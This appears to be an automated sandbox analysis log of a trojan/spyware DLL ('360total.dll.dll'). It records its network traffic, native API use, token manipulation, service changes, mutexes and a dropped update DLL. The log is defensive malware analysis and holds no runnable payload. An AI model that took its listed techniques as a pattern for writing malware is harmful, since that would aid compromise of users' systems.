Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown HTTPS traffic detected: 40.126.28.23:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.28.23:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.46.214.6:443 -> 192.168.2.5:49727 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.46.214.6:443 -> 192.168.2.5:49728 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.28.23:443 -> 192.168.2.5:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.5:49734 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.5:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.46.75:443 -> 192.168.2.5:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.219.28:443 -> 192.168.2.5:49750 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.42.73.28:443 -> 192.168.2.5:49779 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.207:443 -> 192.168.2.5:49781 version: TLS 1.2
Abnormal high CPU Usage
Source: C:\Windows\System32\rundll32.exe Process Stats: CPU usage > 49%
Contains functionality to call native functions
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16CB0C4 NtOpenKey,RtlpNtOpenKey, 4_2_00000237C16CB0C4
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16C78C0 NtReadFile, 4_2_00000237C16C78C0
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16C7B40 NtFreeVirtualMemory, 4_2_00000237C16C7B40
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16CAD34 NtAllocateVirtualMemory, 4_2_00000237C16CAD34
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16CB1D4 NtQueryValueKey,NtQueryValueKey,NtClose, 4_2_00000237C16CB1D4
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16C79C8 NtClose, 4_2_00000237C16C79C8
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16C77B0 RtlInitUnicodeString,NtCreateFile, 4_2_00000237C16C77B0
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16C378C NtClose, 4_2_00000237C16C378C
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16C7588 RtlInitUnicodeString,NtCreateFile,NtClose, 4_2_00000237C16C7588
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16C463C GetModuleHandleW,GetCurrentProcessId,GetCurrentProcessId,GetCurrentProcessId,OpenProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WideCharToMultiByte,CloseHandle,FindCloseChangeNotification, 4_2_00000237C16C463C
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16C7A54 NtWriteFile, 4_2_00000237C16C7A54
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16D0AC0 NtFreeVirtualMemory, 4_2_00000237C16D0AC0
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16C7ACC NtClose, 4_2_00000237C16C7ACC
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16D0A78 NtClose, 4_2_00000237C16D0A78
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16C7694 RtlInitUnicodeString,NtDeleteFile, 4_2_00000237C16C7694
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16D0A90 NtDeleteFile, 4_2_00000237C16D0A90
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16C745C RtlInitUnicodeString,NtOpenFile,NtClose, 4_2_00000237C16C745C
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16CCB54 NtDelayExecution, 4_2_00000237C16CCB54
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16C7704 NtQueryInformationFile, 4_2_00000237C16C7704
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16D0AF0 NtWriteFile, 4_2_00000237C16D0AF0
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B57E248C NtFreeVirtualMemory, 8_3_000001E3B57E248C
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B57E241C NtAllocateVirtualMemory, 8_3_000001E3B57E241C
Contains functionality to communicate with device drivers
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018006A2C8: DeviceIoControl, 3_2_000000018006A2C8
Contains functionality to launch a process as a different user
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018004B1A4 memset,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,WTSGetActiveConsoleSessionId,WTSQueryUserToken,GetTokenInformation,DuplicateTokenEx,CreateEnvironmentBlock,CreateProcessAsUserW,GetLastError,DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle, 3_2_000000018004B1A4
Detected potential crypto function
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180017FE8 3_2_0000000180017FE8
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018006DFF4 3_2_000000018006DFF4
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800220D8 3_2_00000001800220D8
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018007C140 3_2_000000018007C140
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180060174 3_2_0000000180060174
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018008023C 3_2_000000018008023C
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018000834C 3_2_000000018000834C
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018006C470 3_2_000000018006C470
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800784E0 3_2_00000001800784E0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800764F0 3_2_00000001800764F0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180060578 3_2_0000000180060578
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180010580 3_2_0000000180010580
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018004E5DC 3_2_000000018004E5DC
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180062600 3_2_0000000180062600
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180002610 3_2_0000000180002610
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180004638 3_2_0000000180004638
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018004A650 3_2_000000018004A650
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018006E760 3_2_000000018006E760
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800647B0 3_2_00000001800647B0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018007E7C7 3_2_000000018007E7C7
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180076930 3_2_0000000180076930
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180062954 3_2_0000000180062954
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018006A994 3_2_000000018006A994
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018006E9FC 3_2_000000018006E9FC
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180082A18 3_2_0000000180082A18
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180072A27 3_2_0000000180072A27
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180010B58 3_2_0000000180010B58
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180026C84 3_2_0000000180026C84
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018001ECF4 3_2_000000018001ECF4
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180008E20 3_2_0000000180008E20
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180052FD8 3_2_0000000180052FD8
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018003AFE8 3_2_000000018003AFE8
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018005D014 3_2_000000018005D014
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018006F0B4 3_2_000000018006F0B4
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800630CC 3_2_00000001800630CC
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018005912C 3_2_000000018005912C
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018004B1A4 3_2_000000018004B1A4
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180049278 3_2_0000000180049278
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018007B2D0 3_2_000000018007B2D0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018002B2EC 3_2_000000018002B2EC
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018006D3D4 3_2_000000018006D3D4
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800033E0 3_2_00000001800033E0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180075480 3_2_0000000180075480
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800694A0 3_2_00000001800694A0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018005958C 3_2_000000018005958C
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800576DC 3_2_00000001800576DC
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800097E0 3_2_00000001800097E0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800277FC 3_2_00000001800277FC
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018002D964 3_2_000000018002D964
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180073B60 3_2_0000000180073B60
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018007BBB0 3_2_000000018007BBB0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018001BC38 3_2_000000018001BC38
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018005DD18 3_2_000000018005DD18
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180073DF0 3_2_0000000180073DF0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180011DF0 3_2_0000000180011DF0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018005BE6C 3_2_000000018005BE6C
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018004FF88 3_2_000000018004FF88
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16C1030 4_2_00000237C16C1030
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B57E4B50 8_3_000001E3B57E4B50
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5879708 8_3_000001E3B5879708
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B57E453C 8_3_000001E3B57E453C
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5862B38 8_3_000001E3B5862B38
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B586DB34 8_3_000001E3B586DB34
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5850B54 8_3_000001E3B5850B54
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B582EA84 8_3_000001E3B582EA84
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5810A8A 8_3_000001E3B5810A8A
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B57ED9E4 8_3_000001E3B57ED9E4
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5810D18 8_3_000001E3B5810D18
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B57E9CBC 8_3_000001E3B57E9CBC
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5855D68 8_3_000001E3B5855D68
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5847C14 8_3_000001E3B5847C14
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B580FC72 8_3_000001E3B580FC72
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B582BB94 8_3_000001E3B582BB94
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B587EBB8 8_3_000001E3B587EBB8
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B585672C 8_3_000001E3B585672C
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5805768 8_3_000001E3B5805768
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B586D63C 8_3_000001E3B586D63C
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5809650 8_3_000001E3B5809650
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B58105A0 8_3_000001E3B58105A0
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B582B5D0 8_3_000001E3B582B5D0
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B580F5FB 8_3_000001E3B580F5FB
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B58405FC 8_3_000001E3B58405FC
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5874940 8_3_000001E3B5874940
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5858980 8_3_000001E3B5858980
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B58598B0 8_3_000001E3B58598B0
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B586D8B8 8_3_000001E3B586D8B8
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5818824 8_3_000001E3B5818824
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B57F77E0 8_3_000001E3B57F77E0
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B581D834 8_3_000001E3B581D834
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5847874 8_3_000001E3B5847874
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B586B370 8_3_000001E3B586B370
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B57E6358 8_3_000001E3B57E6358
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B57EE31C 8_3_000001E3B57EE31C
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B583318C 8_3_000001E3B583318C
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B57FD19C 8_3_000001E3B57FD19C
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B58151C0 8_3_000001E3B58151C0
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B58411CC 8_3_000001E3B58411CC
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B58251F8 8_3_000001E3B58251F8
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B58101FB 8_3_000001E3B58101FB
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5855534 8_3_000001E3B5855534
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5800540 8_3_000001E3B5800540
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5843498 8_3_000001E3B5843498
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B57E8568 8_3_000001E3B57E8568
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B582F4C4 8_3_000001E3B582F4C4
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B58484D8 8_3_000001E3B58484D8
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B58694F0 8_3_000001E3B58694F0
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5852430 8_3_000001E3B5852430
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5837448 8_3_000001E3B5837448
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B583E45C 8_3_000001E3B583E45C
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B58573A0 8_3_000001E3B58573A0
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B58283EC 8_3_000001E3B58283EC
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B585AF20 8_3_000001E3B585AF20
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B57EBEB8 8_3_000001E3B57EBEB8
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5829F68 8_3_000001E3B5829F68
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B587AE84 8_3_000001E3B587AE84
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5870EC0 8_3_000001E3B5870EC0
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5841ECC 8_3_000001E3B5841ECC
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5837EE8 8_3_000001E3B5837EE8
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B57FFE38 8_3_000001E3B57FFE38
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5809D94 8_3_000001E3B5809D94
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5879D94 8_3_000001E3B5879D94
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5838DF8 8_3_000001E3B5838DF8
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5840114 8_3_000001E3B5840114
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5854134 8_3_000001E3B5854134
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5850154 8_3_000001E3B5850154
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B58270C0 8_3_000001E3B58270C0
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B583F018 8_3_000001E3B583F018
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B57E7FD0 8_3_000001E3B57E7FD0
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5806038 8_3_000001E3B5806038
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B584A048 8_3_000001E3B584A048
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B581E074 8_3_000001E3B581E074
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B57E6078 8_3_000001E3B57E6078
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\Custom_update\Update_27361bf8.dll 4CF2B612939359977DF51A32D2F63E2CB0C6C601E114B8E4812BD548D1DB85FE
Found potential string decryption / allocating functions
Source: C:\Windows\System32\rundll32.exe Code function: String function: 000000018000CF30 appears 33 times
Source: C:\Windows\System32\rundll32.exe Code function: String function: 0000000180005348 appears 71 times
One or more processes crash
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6200 -s 456
Source: classification engine Classification label: mal100.spre.troj.spyw.evad.winDLL@90/16@10/7
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180049050 GetCurrentProcessId,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,SetLastError,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,OpenProcess, 3_2_0000000180049050
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018004B1A4 memset,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,WTSGetActiveConsoleSessionId,WTSQueryUserToken,GetTokenInformation,DuplicateTokenEx,CreateEnvironmentBlock,CreateProcessAsUserW,GetLastError,DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle, 3_2_000000018004B1A4
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180049278 LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,??_U@YAPEAX_K@Z,GetCurrentProcess,OpenProcessToken,CreateRestrictedToken,CloseHandle,CloseHandle,AllocateAndInitializeSid,GetLengthSid,SetTokenInformation,FreeSid,AdjustTokenPrivileges,??_V@YAXPEAX@Z, 3_2_0000000180049278
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018008395A DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle, 3_2_000000018008395A
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018004B780 CreateToolhelp32Snapshot,memset,Process32FirstW,_wcsicmp,ProcessIdToSessionId,Process32NextW,CloseHandle,CloseHandle, 3_2_000000018004B780
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800072A8 CoCreateInstance, 3_2_00000001800072A8
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018003A8D4 LoadLibraryExW,FindResourceW,SizeofResource,LoadResource,LockResource,malloc,memmove,FreeResource,FreeLibrary,VerQueryValueW,free, 3_2_000000018003A8D4
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180049AEC OpenSCManagerW,OpenServiceW,ChangeServiceConfigW,StartServiceW,GetTickCount,Sleep,GetTickCount,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle, 3_2_0000000180049AEC
Source: C:\Windows\System32\rundll32.exe File created: C:\Users\user\AppData\Roaming\Custom_update Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6196:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5504:120:WilError_03
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6200
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2780:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7116:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6560:120:WilError_03
Source: C:\Windows\System32\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\runnung
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6172:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6608:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3772:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7072:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3636:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1680:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4208:120:WilError_03
Source: C:\Windows\System32\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\Uhad32.tmp Jump to behavior
Source: 360total.dll.dll Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\loaddll64.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\360total.dll.dll,CreateObject
Source: rundll32.exe, rundll32.exe, 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000003.2007308735.00000237C3230000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2008448685.0000000180086000.00000002.00000001.01000000.00000000.sdmp, Update_27361bf8.dll.4.dr Binary or memory string: select * from sqlite_sequence;
Source: rundll32.exe, 00000008.00000003.3366590989.000001E3B5885000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: rundll32.exe, rundll32.exe, 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000003.2007308735.00000237C3230000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2008448685.0000000180086000.00000002.00000001.01000000.00000000.sdmp, Update_27361bf8.dll.4.dr Binary or memory string: update sqlite_sequence set seq = 0 where name='MT';
